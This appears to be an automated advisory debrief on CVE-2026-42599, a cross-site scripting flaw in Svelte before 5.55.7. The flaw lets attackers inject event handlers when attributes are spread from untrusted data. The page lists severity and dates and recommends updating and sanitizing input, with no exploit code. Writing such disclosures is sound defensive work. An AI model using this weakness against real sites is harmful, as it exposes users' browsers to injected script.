PatchSiren cyber security CVE debrief
CVE-2026-42599 sveltejs CVE debrief
CVE-2026-42599 is a MEDIUM severity vulnerability in Svelte, a performance-oriented web framework. Prior to version 5.55.7, it allows attackers to inject malicious event handlers via spread syntax when rendering attributes from untrusted data. This can lead to execution in victims' browsers if JavaScript is enabled and Svelte's hydration mechanism doesn't reach the vulnerable element before the event fires.
- Vendor
- sveltejs
- Product
- svelte
- CVSS
- MEDIUM 5.1
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2026-06-09
- Original CVE updated
- 2026-06-11
- Advisory published
- 2026-06-09
- Advisory updated
- 2026-06-11
Who should care
Developers using Svelte versions prior to 5.55.7, especially those rendering user-controlled or external data as element attributes.
Technical summary
The vulnerability exists in Svelte's handling of spread syntax for rendering attributes. When using this feature with untrusted data, an attacker can inject malicious event handlers. The attack requires the victim's browser to have JavaScript enabled, and the Svelte hydration mechanism must not reach the vulnerable element before the event triggers.
Defensive priority
MEDIUM
Recommended defensive actions
- Update Svelte to version 5.55.7 or later.
- Avoid using spread syntax to render attributes from untrusted data.
- Validate and sanitize user-controlled or external data before rendering it as element attributes.
Evidence notes
This CVE was published on 2026-06-09T17:17:07.550Z and modified on 2026-06-11T18:41:34.993Z. It has a CVSS score of 5.1 and is classified as CWE-79.
Official resources
-
CVE-2026-42599 CVE record
CVE.org
-
CVE-2026-42599 NVD detail
NVD
-
Source item URL
nvd_modified
-
Mitigation or vendor reference
[email protected] - Release Notes
-
Mitigation or vendor reference
[email protected] - Vendor Advisory
CVE-2026-42599 was published on 2026-06-09T17:17:07.550Z and modified on 2026-06-11T18:41:34.993Z.